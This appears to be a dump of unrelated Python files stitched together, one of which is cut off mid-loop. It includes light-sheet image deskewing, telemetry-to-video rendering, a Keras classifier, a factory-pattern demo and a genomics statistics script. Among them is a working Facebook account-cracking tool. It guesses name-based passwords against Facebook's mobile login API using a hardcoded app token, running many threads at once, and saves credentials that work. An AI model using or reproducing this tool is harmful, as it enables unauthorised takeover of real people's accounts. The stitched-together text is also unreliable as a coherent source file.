self.isBackendAlive(self.GO_SERVICE_URL, "go service")
if __name__ == '__main__':
unittest.main()
|
import math
import numpy
from dexp.utils import xpArray
from dexp.utils.backends import Backend, NumpyBackend
def yang_deskew(
image: xpArray,
depth_axis: int,
lateral_axis: int,
flip_depth_axis: bool,
dx: float,
dz: float,
angle: float,
camera_orientation: int = 0,
num_split: int = 4,
internal_dtype=None,
):
"""'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 )
Parameters
----------
image : input image (skewed 3D stack)
depth_axis : Depth axis.
lateral_axis : Lateral axis.
flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1)
dz : float, scanning step (stage or galvo scanning step, not the same as the distance between the slices)
dx : float, pixel size of the camera
angle : float, incident angle of the light sheet, angle between the light sheet and the optical axis in degrees
camera_orientation : Camera orientation correction expressed
as a number of 90 deg rotations to be performed per 2D image in stack.
num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU
internal_dtype : internal dtype to perform computation
Returns
-------
Deskewed image
"""
# compute dimensionless parameters:
xres = dx * math.cos(angle * math.pi / 180)
resample_factor = int(round(dz / xres))
lateral_scaling = xres / dx
image = yang_deskew_dimensionless(
image=image,
depth_axis=depth_axis,
lateral_axis=lateral_axis,
flip_depth_axis=flip_depth_axis,
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
camera_orientation=camera_orientation,
num_split=num_split,
internal_dtype=internal_dtype,
)
return image
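# A minimal usage sketch (hypothetical acquisition parameters):
#   deskewed = yang_deskew(image, depth_axis=0, lateral_axis=1,
#                          flip_depth_axis=True, dx=0.4, dz=1.0, angle=45.0)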
def yang_deskew_dimensionless(
image: xpArray,
depth_axis: int,
lateral_axis: int,
flip_depth_axis: bool,
resample_factor: int,
lateral_scaling: float,
camera_orientation: int = 0,
num_split: int = 4,
internal_dtype=None,
):
"""'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 )
Parameters
----------
image : input image (skewed 3D stack)
depth_axis : Depth axis.
lateral_axis : Lateral axis.
flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
camera_orientation : Camera orientation correction expressed as a
number of 90 deg rotations to be performed per 2D image in stack.
num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU
internal_dtype : internal dtype to perform computation
Returns
-------
Deskewed image
"""
    # we don't want to move the image to the backend just now,
    # as it might be a very large image, and we can defer moving it
    # to the backend until after splitting...
xp = Backend.get_xp_module(image)
# We save the original dtype:
original_dtype = image.dtype
# Default internal dtype is the same as the input image:
if internal_dtype is None:
internal_dtype = image.dtype
# Numpy backend does not support float16:
if type(Backend.current()) is NumpyBackend and internal_dtype == xp.float16:
internal_dtype = xp.float32
# First we compute the permutation that will reorder the axis so that the depth and
# lateral axis are the first axis in the image:
permutation = (depth_axis, lateral_axis) + tuple(
axis for axis in range(image.ndim) if axis not in [depth_axis, lateral_axis]
)
permutation = numpy.asarray(permutation)
inverse_permutation = numpy.argsort(permutation)
# We apply the permutation:
image = xp.transpose(image, axes=permutation)
if flip_depth_axis:
image = xp.flip(image, axis=0)
# rotate the data
# Note: the weird 1+co mod 4 is due to the fact that Bin's original
# code was implemented for a different orientation...
image = xp.rot90(image, k=(1 + camera_orientation) % 4, axes=(1, 2))
# deskew and rotate
image = _resampling_vertical_split(
image,
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
num_split=num_split,
internal_dtype=internal_dtype,
)
# flip along axis x
if flip_depth_axis:
xp = Backend.get_xp_module(image)
# _resampling_vertical_split transposes axis 0 with axis 2, so we flip along 2:
image = xp.flip(image, axis=2)
# We apply the inverse permutation:
image = xp.transpose(image, axes=inverse_permutation)
# Cast back to original dtype:
image = image.astype(original_dtype, copy=False)
return image
def _resampling_vertical_split(
image, resample_factor: int, lateral_scaling: float, num_split: int = 4, internal_dtype=None
):
"""Same as resampling_vertical but splits the input image so that computation can fit in GPU memory.
Parameters
----------
image : input image (skewed 3D stack)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
internal_dtype : internal dtype to perform computation
Returns
-------
Resampled image.
Important note: for scalability reasons, the returned image is always numpy image.
"""
if num_split == 1:
output = _resampling_vertical(
image, resample_factor=resample_factor, lateral_scaling=lateral_scaling, internal_dtype=internal_dtype
)
else:
xp = Backend.get_xp_module(image)
data_gpu_splits = xp.array_split(image, num_split, axis=1)
data_cpu_splits = []
for k in range(num_split):
data_resampled = _resampling_vertical(
data_gpu_splits[k],
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
internal_dtype=internal_dtype,
)
data_cpu_splits.append(Backend.to_numpy(data_resampled, dtype=image.dtype))
output = numpy.concatenate(data_cpu_splits, axis=1)
return output
def _resampling_vertical(image, resample_factor: int, lateral_scaling: float, internal_dtype=None):
"""Resampling of the image by interpolation along vertical direction.
Here we assume the dz is integer multiple of dx * cos(angle * pi / 180),
    one can also pre-interpolate the data along the z' axis if this is not the case
Parameters
----------
image : input image (skewed 3D stack)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
internal_dtype : internal dtype to perform computation
Returns
-------
Resampled image
"""
xp = Backend.get_xp_module()
sp = Backend.get_sp_module()
# Move images to backend.
image = Backend.to_backend(image, dtype=internal_dtype)
(nz, ny, nx) = image.shape
dtype = image.dtype
nz_new, ny_new, nx_new = len(range(0, nx, resample_factor)), ny, nx + nz * resample_factor
data_reassign = xp.zeros((nz_new, ny_new, nx_new), internal_dtype)
for x in range(nx):
x_start = x
x_end = nz * resample_factor + x
data_reassign[x // resample_factor, :, x_start:x_end:resample_factor] = image[:, :, x].T
del image
# rescale the data, interpolate along z
data_rescale = sp.ndimage.zoom(data_reassign, zoom=(resample_factor, 1, 1), order=1)
del data_reassign
data_interp = xp.zeros((nz_new, ny_new, nx_new), dtype)
for z in range(nz_new):
for k in range(resample_factor):
data_interp[z, :, k::resample_factor] = data_rescale[z * resample_factor - k, :, k::resample_factor]
del data_rescale
    # rescale the data to have the same voxel size along x and y;
# remove the first z slice which has artifacts due to resampling
image_final = sp.ndimage.zoom(data_interp[1:], zoom=(1, 1, lateral_scaling), order=1)
return image_final
|
import os
import argparse
import cv
import sys
global inputParser # just a reminder, it's used as a global variable
global inputArgs # just a reminder, it's used as a global variable
def parseInput() :
global inputParser
global inputArgs
inputParser = argparse.ArgumentParser(description='Render telemetry (attitude) to video from Anemoi autopilot')
    inputParser.add_argument('sessionFolder', nargs=1, help='folder containing processed autopilot logs (30 FPS)')
inputArgs = inputParser.parse_args()
def processInput() :
print inputArgs.sessionFolder
scriptDir = os.path.dirname(os.path.abspath(__file__))
os.system("touch /run/shm/attitude2video_opencv.lock")
data_yaw=[]
data_pitch=[]
data_roll=[]
data_speed=[]
data_altitude=[]
data_climb=[]
sourceFile_yaw = open(inputArgs.sessionFolder[0]+"/logs/interpolated_yaw_30fps.txt", 'r')
for line in sourceFile_yaw :
data_yaw.append(float(line))
sourceFile_yaw.close()
sourceFile_pitch = open(inputArgs.sessionFolder[0]+"/logs/interpolated_pitch_30fps.txt", 'r')
for line in sourceFile_pitch :
data_pitch.append(float(line))
sourceFile_pitch.close()
sourceFile_roll = open(inputArgs.sessionFolder[0]+"/logs/interpolated_roll_30fps.txt", 'r')
for line in sourceFile_roll :
data_roll.append(float(line))
sourceFile_roll.close()
sourceFile_speed = open(inputArgs.sessionFolder[0]+"/logs/interpolated_speed_30fps.txt", 'r')
for line in sourceFile_speed :
data_speed.append(float(line)*3600/1000)
sourceFile_speed.close()
sourceFile_altitude = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_30fps.txt", 'r')
for line in sourceFile_altitude :
data_altitude.append(float(line))
sourceFile_altitude.close()
sourceFile_climb = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_speed_30fps.txt", 'r')
for line in sourceFile_climb :
data_climb.append(float(line))
sourceFile_climb.close()
    # create working directory in shared memory
if not os.path.exists("/dev/shm/attitude2video_opencv") :
os.makedirs("/dev/shm/attitude2video_opencv")
# prepare image templates
os.system("cp "+scriptDir+"/resources_opencv/speed.png /dev/shm/attitude2video_opencv/speed.png")
os.system("cp "+scriptDir+"/resources_opencv/climb.png /dev/shm/attitude2video_opencv/climb.png")
os.system("cp "+scriptDir+"/resources_opencv/center.png /dev/shm/attitude2video_opencv/center.png")
os.system("cp "+scriptDir+"/resources_opencv/horizon.png /dev/shm/attitude2video_opencv/horizon.png")
os.system("cp "+scriptDir+"/resources_opencv/terrain.png /dev/shm/attitude2video_opencv/terrain.png")
os.system("cp "+scriptDir+"/resources_opencv/compass.png /dev/shm/attitude2video_opencv/compass.png")
os.system("cp "+scriptDir+"/resources_opencv/altitude.png /dev/shm/attitude2video_opencv/altitude.png")
os.system("cp "+scriptDir+"/resources_opencv/background.png /dev/shm/attitude2video_opencv/background.png")
# create working directory
if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work") :
os.makedirs(inputArgs.sessionFolder[0]+"/media/work")
if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") :
os.makedirs(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
    ## Aptly named MAGIC
# But before that, let's load the templates
originalSpeed = cv.LoadImage("/dev/shm/attitude2video_opencv/speed.png")
originalClimb = cv.LoadImage("/dev/shm/attitude2video_opencv/climb.png")
originalCenter = cv.LoadImage("/dev/shm/attitude2video_opencv/center.png")
    originalHorizon = cv.LoadImage("/dev/shm/attitude2video_opencv/horizon.png")
originalTerrain = cv.LoadImage("/dev/shm/attitude2video_opencv/terrain.png")
originalCompass = cv.LoadImage("/dev/shm/attitude2video_opencv/compass.png")
originalAltitude = cv.LoadImage("/dev/shm/attitude2video_opencv/altitude.png")
for x in range(0, len(data_speed)):
progressbar(((x*1.0+1)/len(data_speed)), "Rendering openCV:", "(" + str(x+1) + "/" + str(len(data_speed)) + ") " + "attitude_%07d.jpg" % (x+1), 20)
#for x in range(0,1):
currentSpeed = cv.CloneImage(originalSpeed)
currentClimb = cv.CloneImage(originalClimb)
currentCenter = cv.CloneImage(originalCenter)
currentHorizon = cv.CloneImage(originalHorizon)
currentTerrain = cv.CloneImage(originalTerrain)
currentCompass = cv.CloneImage(originalCompass)
currentAltitude = cv.CloneImage(originalAltitude)
# 0 ------------------------------------------------
# Rotate center
picCenter = (originalHorizon.width/2.0, originalHorizon.height/2.0)
outputMatrix = cv.CreateMat(2, 3, cv.CV_32F)
cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix) # Positive number goes counter-clockwise, counter to what the original code did. Ergo, do * away with -1
cv.WarpAffine(originalHorizon, currentHorizon, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0))
# Rotate horizon
picCenter = (originalCenter.width/2.0, originalCenter.height/2.0)
outputMatrix = cv.CreateMat(2, 3, cv.CV_32F)
cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix)
cv.WarpAffine(originalCenter, currentCenter, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0))
# 1 ------------------------------------------------
        odmik = data_pitch[x]*3.0*-1.0 # odmik ("offset"); reverse it again.
width = 640
height = 360
        picCenter = (currentHorizon.width/2.0, currentHorizon.height/2.0)
regionOfInterest = (int(picCenter[0]-(width/2.0)), int(picCenter[1]-(height/2.0)+(odmik)), int(width), int(height))
thirdHorizon = cv.GetSubRect(currentHorizon, regionOfInterest)
# Instead of copy-ing we do subtraction. Works, since we're using (mostly) black for displaying things. Templates need to be alpha-less and inverted.
        cv.Sub(thirdHorizon, originalTerrain, thirdHorizon)
        cv.Sub(thirdHorizon, currentCenter, thirdHorizon)
# 2 ------------------------------------------------
        zacetnaPozicija = width/2.0 # zacetnaPozicija ("starting position")
if data_yaw[x] <= 180:
zacetnaPozicija = zacetnaPozicija + 3.9*data_yaw[x]
else:
zacetnaPozicija = zacetnaPozicija + 3.9*(360-data_yaw[x])
        # Speed improvement. Which isn't faster. Yay.
compassHeight = 50
regionOfInterest = (int(currentCompass.width/2.0-zacetnaPozicija), int(0), int(width), int(compassHeight))
currentCompass = cv.GetSubRect(currentCompass, regionOfInterest)
regionOfInterest = (int(0), int(0), int(width), int(compassHeight))
pointerToSpace = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToSpace, currentCompass, pointerToSpace)
# 3 ------------------------------------------------
speedCenter = (originalSpeed.width/2.0, originalSpeed.height/2.0)
speedWidth = originalSpeed.width
speedHeight = originalSpeed.height
zacetnaPozicija = speedHeight/2.0
if data_speed[x] < 0:
zacetnaPozicija = zacetnaPozicija - 210
elif data_speed[x] >= 100:
zacetnaPozicija = zacetnaPozicija + 210
else:
zacetnaPozicija = zacetnaPozicija + (200-(data_speed[x]*4))
doDol = speedHeight - zacetnaPozicija
if (doDol > 130):
doDol = 130
doGor = zacetnaPozicija
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0), int(zacetnaPozicija-doGor), int(speedWidth), int(doDol+doGor))
currentSpeed = cv.GetSubRect(originalSpeed, regionOfInterest)
regionOfInterest = (int(width/2.0 - 190 - currentSpeed.width/2.0),
int(height/2.0 - doGor),
int(speedWidth),
int(doGor+doDol))
pointerToWhereToCopySpeed = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopySpeed, currentSpeed, pointerToWhereToCopySpeed)
# 4 ------------------------------------------------
        lokalniOdmik = 0 # lokalniOdmik ("local offset")
if data_altitude[x] < 0:
lokalniOdmik = 2010
elif data_altitude[x] >= 1000:
lokalniOdmik = -2010
else:
lokalniOdmik = -(2000-(data_altitude[x]*4))
temp = currentAltitude.height / 2.0
doDol = (temp + lokalniOdmik)
if (doDol > 130):
doDol = 130
doGor = temp - lokalniOdmik
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0),
int(currentAltitude.height/2.0 - lokalniOdmik - doGor),
int(speedWidth),
int(doGor+doDol))
cutAltitude = cv.GetSubRect(currentAltitude, regionOfInterest)
regionOfInterest = (int(width/2.0 + 160), int(height/2.0 - doGor), int(70), int(doGor+doDol))
pointerToWhereToCopyAltitude = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopyAltitude, cutAltitude, pointerToWhereToCopyAltitude)
# ------------------------------------------------
lokalniOdmik = 0
if data_climb[x] < -10:
lokalniOdmik = -410
elif data_climb[x] >= 10:
lokalniOdmik = 410
else:
lokalniOdmik = ((data_climb[x]*4*10))
        temp = currentClimb.height / 2.0
doDol = (temp + lokalniOdmik)
if (doDol > 130):
doDol = 130
doGor = temp - lokalniOdmik
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0),
int(currentClimb.height/2.0 - lokalniOdmik - doGor),
int(speedWidth),
int(doGor+doDol))
cutClimb = cv.GetSubRect(currentClimb, regionOfInterest)
regionOfInterest = (int(width/2.0 + 245), int(height/2.0 - doGor), int(70), int(doGor+doDol))
pointerToWhereToCopyClimb = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopyClimb, cutClimb, pointerToWhereToCopyClimb)
# 5 ------------------------------------------------
cv.SaveImage("/dev/shm/attitude2video_opencv/composed.png", thirdHorizon)
os.system("cp /dev/shm/attitude2video_opencv/composed.png "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png" % (x+1,))
# CLEAR ALL VARIABLES! You know, memory leaks and such.
# 6 ------------------------------------------------
# KONEC
os.system("avconv -r 30 -i "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png -qscale 1 -b 1300k -vcodec libx264 "+inputArgs.sessionFolder[0]+"/media/attitude.mp4")
# remove working directory with temporary files
fileList = os.listdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
for fileName in fileList:
os.remove(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv"+"/"+fileName)
os.rmdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
#os.rmdir(inputArgs.sessionFolder[0]+"/media/work")
    # remove working directory with temporary files in shared memory
fileList = os.listdir("/dev/shm/attitude2video_opencv")
for fileName in fileList:
os.remove("/dev/shm/attitude2video_opencv"+"/"+fileName)
os.rmdir("/dev/shm/attitude2video_opencv")
os.system("rm -f /run/shm/attitude2video_opencv.lock")
def progressbar(progress, prefix = "", postfix = "", size = 60) :
x = int(size*progress)
sys.stdout.write("%s [%s%s] %d%% %s\r" % (prefix, "#"*x, "."*(size-x), (int)(progress*100), postfix))
sys.stdout.flush()
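# e.g. progressbar(0.5, "Rendering:", "(500/1000)", 20) draws:
#   Rendering: [##########..........] 50% (500/1000)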
if __name__ == "__main__": # this is not a module
parseInput() # what do we have to do
processInput() # doing what we have to do
print "" # for estetic output
|
#!/usr/bin/env python3
# Author : Gobel
# Github : Gobel-coder
# Facebook : fb.me/fadlykaes
import os
import json
import requests
from concurrent.futures import ThreadPoolExecutor
global result,check,die
life = []
chek = []
result = 0
check = 0
die = 0
def sorting(users,cek=False):
with ThreadPoolExecutor(max_workers=30) as ex:
if not cek:
expas = input("# extra password : ")
for user in users:
users = user.split('|')
ss = users[0].split(' ')
if len(ss) == 1:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[0] + "12"
pass4 = ss[0] + "1234"
pass5 = ss[0] + "01"
pass6 = ss[0] + "123456"
elif len(ss) == 2:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[1] + "12"
pass4 = ss[1] + "1234"
pass5 = ss[0] + "123456"
pass6 = ss[0] + "01"
elif len(ss) == 3:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[0] + "12"
pass4 = ss[1] + "01"
pass5 = ss[1] + "12"
pass6 = ss[1] + "12345"
listpass = [
pass1,
pass2,
pass3,
pass4,
pass5,
pass6,
expas,
]
for passw in listpass:
ex.submit(login,(users[1]),(passw))
else:
for user in users:
frx = user.split("|")
ex.submit(login,(frx[0]),(frx[1]),(True))
if cek:
os.remove("results-check.txt")
os.remove("results-life.txt")
for x in life:
with open('results-life.txt','a') as f:
f.write(x+'\n')
for x in chek:
with open('results-check.txt','a') as f: f.write(x+"\n")
print("\n# Done")
print("# saved to results-check.txt results-life.txt")
elif check != 0 or result != 0:
print("\n# Done. file saved in : ")
print(" - life : results-life.txt")
print(" - checkpoint : results-check.txt")
exit("# thanks for using this tools")
else:
print("\n# Done")
exit("# no result")
def login(username,password,cek=False):
global result,check,die
b = "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32"
params = {
'access_token': b,
'format': 'JSON',
'sdk_version': '2',
'email': username,
'locale': 'en_US',
'password': password,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6', }
api = 'https://b-api.facebook.com/method/auth.login'
response = requests.get(api, params=params)
if 'session_key' in response.text and "EAAA" in response.text:
print(f"\r \033[0;m[\033[92;mLIFE\033[0;m] {username} => {password} ",end="")
print()
result += 1
if cek:
life.append(username+"|"+password)
else:
with open('results-life.txt','a') as f:
f.write(username + '|' + password + '\n')
elif 'www.facebook.com' in response.json()['error_msg']:
print(f"\r \033[0;m[\033[93;mCHEK\033[0;m] {username} => {password} ",end="")
print()
check += 1
if cek:
chek.append(username+"|"+password)
else:
with open('results-check.txt','a') as f:
f.write(username + '|' + password + '\n')
else:
die += 1
print(f"\r# life : (\033[92;m{str(result)}\033[0;m)|checkpoint : (\033[93;m{str(check)}\033[0;m)|die : ({str(die)})",end="")
|
import codecs
import os
import string
import numpy
from keras import regularizers
from keras.layers import Dense, Embedding, LSTM, CuDNNLSTM, SpatialDropout1D, Input, Bidirectional, Dropout, \
BatchNormalization, Lambda, concatenate, Flatten
from keras.models import Model
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras.initializers import Constant
from scipy import sparse
# precision recall f1-score support
#
# B 0.9445 0.9460 0.9453 56882
# M 0.6950 0.8280 0.7557 11479
# E 0.9421 0.9359 0.9390 56882
# S 0.9441 0.9061 0.9247 47490
#
# micro avg 0.9239 0.9239 0.9239 172733
# macro avg 0.8814 0.9040 0.8912 172733
# weighted avg 0.9270 0.9239 0.9249 172733
# {'mean_squared_error': 0.2586491465518497, 'mean_absolute_error': 0.27396197698378544, 'mean_absolute_percentage_error': 0.3323864857505891, 'mean_squared_logarithmic_error': 0.2666326968685906, 'squared_hinge': 0.2827528866772688, 'hinge': 0.27436352076398335, 'categorical_crossentropy': 0.3050300775957548, 'binary_crossentropy': 0.7499999871882543, 'kullback_leibler_divergence': 0.30747676168440974, 'poisson': 0.2897763648871911, 'cosine_proximity': 0.3213321868358391, 'sgd': 0.27380688950156684, 'rmsprop': 0.4363407859974404, 'adagrad': 0.5028908227192664, 'adadelta': 0.3134481079882679, 'adam': 0.342444794579377, 'adamax': 0.36860069757644914, 'nadam': 0.39635284171196516}
words = []
with codecs.open('plain/actor_dic.utf8', 'r', encoding='utf8') as fa:
lines = fa.readlines()
lines = [line.strip() for line in lines]
words.extend(lines)
rxwdict = dict(zip(words,range(1, 1+len(words))))
rxwdict['\n'] =0
rydict = dict(zip(list("ABCDEFZ"), range(len("ABCDEFZ"))))
ytick = [0,18,32,263.5,1346,2321,244001]
def getYClass(y):
    # index of the largest threshold in ytick not exceeding y
    r = 0
    for i in range(len(ytick)):
        if int(y) >= ytick[i]:
            r = i
        else:
            break
    assert r < len(ytick), (y, r)
    return r
batch_size = 20
nFeatures = 5
seqlen = 225  # 85
totallen = nFeatures+seqlen
word_size = 11
actors_size = 8380
Hidden = 150
Regularization = 1e-4
Dropoutrate = 0.2
learningrate = 0.2
Marginlossdiscount = 0.2
nState = 7
EPOCHS = 60
modelfile = os.path.basename(__file__).split(".")[0]
loss = "squared_hinge"
optimizer = "nadam"
sequence = Input(shape=(totallen,))
seqsa= Lambda(lambda x: x[:, 0:nFeatures])(sequence)
seqsb = Lambda(lambda x: x[:, nFeatures:])(sequence)
network_emb = sparse.load_npz("model/weibo_wembedding.npz").todense()
embedded = Embedding(len(words) + 1, word_size, embeddings_initializer=Constant(network_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb)
networkcore_emb = sparse.load_npz("model/weibo_coreembedding.npz").todense()
embeddedc = Embedding(len(words) + 1, actors_size, embeddings_initializer=Constant(networkcore_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb)
concat = concatenate([embedded, embeddedc])
# dropout = Dropout(Dropoutrate)(embedded)
dropout = SpatialDropout1D(rate=Dropoutrate)(concat)
# blstm = Bidirectional(LSTM(Hidden, dropout=Dropoutrate, recurrent_dropout=Dropoutrate, return_sequences=False), merge_mode='sum')(dropout)
blstm = Bidirectional(CuDNNLSTM(Hidden, return_sequences=False), merge_mode='sum')(dropout)
concat = concatenate([seqsa, blstm])
# dropout = Dropout(Dropoutrate)(blstm)
batchNorm = BatchNormalization()(concat)
dense = Dense(nState, activation='softmax', kernel_regularizer=regularizers.l2(Regularization))(batchNorm)
model = Model(inputs=sequence, outputs=dense)
model.compile(loss=loss, optimizer=optimizer, metrics=["accuracy"])
model.summary()
# model.save("keras/B20-E60-F1-PU-L-Bn-De.h5")
MODE = 1
if MODE == 1:
with codecs.open('plain/movie_sentiments.utf8', 'r', encoding='utf8') as fs:
with codecs.open('plain/movie_years.utf8', 'r', encoding='utf8') as fy:
with codecs.open('weibo_dic/movie_ndic.utf8', 'r', encoding='utf8') as fd:
with codecs.open('plain/movie_actornames.utf8', 'r', encoding='utf8') as fa:
with codecs.open('plain/movie_states.utf8', 'r', encoding='utf8') as ff:
ylines = fy.readlines()
slines = fs.readlines()
alines = fa.readlines()
dlines = fd.readlines()
flines = ff.readlines()
assert len(dlines) == len(alines) and len(alines) == len(slines) and len(slines) == len(ylines) and len(flines) == len(ylines)
X = []
print('process X list.')
counter = 0
for i in range(len(dlines)):
item = []
item.append(ylines[i].strip())
item.extend(slines[i].strip().split(','))
item = [int(i) for i in item] # year, p, n
item.append(item[1] + item[2]) # total
item.append(item[1] / item[2] if item[2] != 0 else 0) # PN-ratio
anames = alines[i].strip().split(',')
item.extend([rxwdict.get(name, 0) for name in anames])
# pad right '\n'
#print(len(item))
item.extend([0]*(totallen - len(item)))
assert len(item) == totallen,(len(item))
X.append(item)
if counter % 10000 == 0 and counter != 0:
print('.')
X = numpy.array(X)
print(X.shape)
y=[]
print('process y list.')
for line in flines:
line = line.strip()
yi = numpy.zeros((len("ABCDEFZ")), dtype=int)
yi[getYClass(line)] = 1
y.append(yi)
y = numpy.array(y)
print(y.shape)
                        history = model.fit(X, y, batch_size=batch_size, epochs=EPOCHS, verbose=1)
model.save("keras/%s.h5"%modelfile)
print('FIN')
if MODE == 2:
STATES = list("BMES")
with codecs.open('plain/pku_test.utf8', 'r', encoding='utf8') as ft:
with codecs.open('baseline/pku_test_B20-E60-F1-PU-L-Bn-De_states.txt', 'w', encoding='utf8') as fl:
model = load_model("keras/B20-E60-F1-PU-L-Bn-De.h5")
model.summary()
xlines = ft.readlines()
X = []
print('process X list.')
counter = 0
for line in xlines:
line = line.replace(" ", "").strip()
# X.append([getFeaturesDict(line, i) for i in range(len(line))])
                X.append([rxwdict.get(e, 0) for e in list(line)])
counter += 1
if counter % 1000 == 0 and counter != 0:
print('.')
print(len(X))
            X = pad_sequences(X, maxlen=seqlen, padding='pre', value=0)
print(len(X), X.shape)
yp = model.predict(X)
print(yp.shape)
for i in range(yp.shape[0]):
sl = yp[i]
lens = len(xlines[i].strip())
for s in sl[-lens:]:
i = numpy.argmax(s)
fl.write(STATES[i])
fl.write('\n')
print('FIN')
# for sl in yp:
# for s in sl:
# i = numpy.argmax(s)
# fl.write(STATES[i])
# fl.write('\n')
# print('FIN')
|
# py3.8
###########################################################
#                                                         #
#                       Transport                         #
#                                                         #
###########################################################
class Transport(object):
def deliver(self):
raise NotImplementedError
class Truck(Transport):
def deliver(self):
print("Truck: deliver")
class Ship(Transport):
def deliver(self):
print("Ship: deliver")
###########################################################
#                                                         #
#                       Logistics                         #
#                                                         #
###########################################################
class Logistics(object):
def planDelivery(self):
transport = self.createTransport()
transport.deliver()
def createTransport(self) -> Transport:
raise NotImplementedError
class RoadLogistics(Logistics):
def createTransport(self) -> Transport:
return Truck()
class SeaLogistics(Logistics):
def createTransport(self) -> Transport:
return Ship()
if __name__ == '__main__':
road_logistics = RoadLogistics()
road_logistics.planDelivery()
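    # Sea shipping goes through the same factory hook, e.g.:
    #   SeaLogistics().planDelivery()  # -> "Ship: deliver"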
print("page074")
|
##########################################################
### Import Necessary Modules
import argparse #provides options at the command line
import sys #take command line arguments and uses it in the script
import gzip #allows gzipped files to be read
import re #allows regular expressions to be used
##########################################################
### Command-line Arguments
parser = argparse.ArgumentParser(description="A script to partition individuals from a rolling window statistic script (VCF.stats.windowBased.v1.0.py)")
parser.add_argument("-file", help = "The statistic file", default=sys.stdin, required=True)
parser.add_argument("-ind", help = "The list of individuals seperated by a comma (no spaces), default = NA", default="NA")
parser.add_argument("-avg", help = "Find the average for individuals and only return that (doesn't output the header and format is for circos plot), default = no, option = yes", default="no")
parser.add_argument("-out", help = "If finding the average, what field? default=count, options=depth, het, mis", default="count")
parser.add_argument("-win", help = "What was the window size used to generate data? default=10000", default=10000)
parser.add_argument("-chr", help = "Keep the chromosomes in the following comma delimited list (no spaces) and convert to number. default=no", default="no")
args = parser.parse_args()
#########################################################
### Variables
class OpenFile():
def __init__ (self, f, typ, fnum):
"""Opens a file (gzipped) accepted"""
if re.search(".gz$", f):
self.filename = gzip.open(f, 'rb')
else:
self.filename = open(f, 'r')
if typ == "file":
if int(fnum) == 1:
sys.stderr.write("\n\tOpened stats file: {}\n\n".format(f))
ReadFile(self.filename,fnum,f)
class ReadFile():
def __init__ (self, f, fnum, fname):
self.openFile = f
self.keep = args.ind.split(",")
self.header = "NA"
self.total = {}
self.count = {}
if re.search(".gz$", fname):
self.header = self.openFile.readline().decode('utf-8').rstrip('\n')
else:
self.header = self.openFile.readline().rstrip('\n')
if args.avg == "no":
print("{}".format(self.header))
for line in self.openFile:
try:
line = line.decode('utf-8')
except:
pass
line = line.rstrip('\n')
self.ind, self.mis, self.hRef, self.Het, self.hAlt, self.aDepth, self.window, self.scaffold = line.split()
if self.ind in self.keep:
if args.avg == "no":
print("{}".format(line))
else:
self.value = "NA"
if args.out == "count":
self.value = int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt)
elif args.out == "depth":
try:
self.value = float(self.aDepth)
except:
self.value = "NA"
elif args.out == "het":
self.value = int(self.Het)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt))
elif args.out == "mis":
self.value = int(self.mis)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt))
if self.value != "NA":
if self.scaffold in self.total:
if self.window in self.total[self.scaffold]:
self.total[self.scaffold][self.window] += self.value
self.count[self.scaffold][self.window] += 1
else:
self.total[self.scaffold][self.window] = self.value
self.count[self.scaffold][self.window] = 1
else:
self.total[self.scaffold] = {}
self.count[self.scaffold] = {}
self.total[self.scaffold][self.window] = self.value
self.count[self.scaffold][self.window] = 1
if args.avg == "yes":
for self.scaffold in sorted(self.total):
for self.window in sorted(self.total[self.scaffold], key = int):
if args.chr == "no":
print ("{}\t{}\t{}\t{}".format(self.scaffold, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window])))
else:
self.allChroms = args.chr.split(",")
for self.chrNum, self.chr in enumerate(self.allChroms):
if self.chr == self.scaffold:
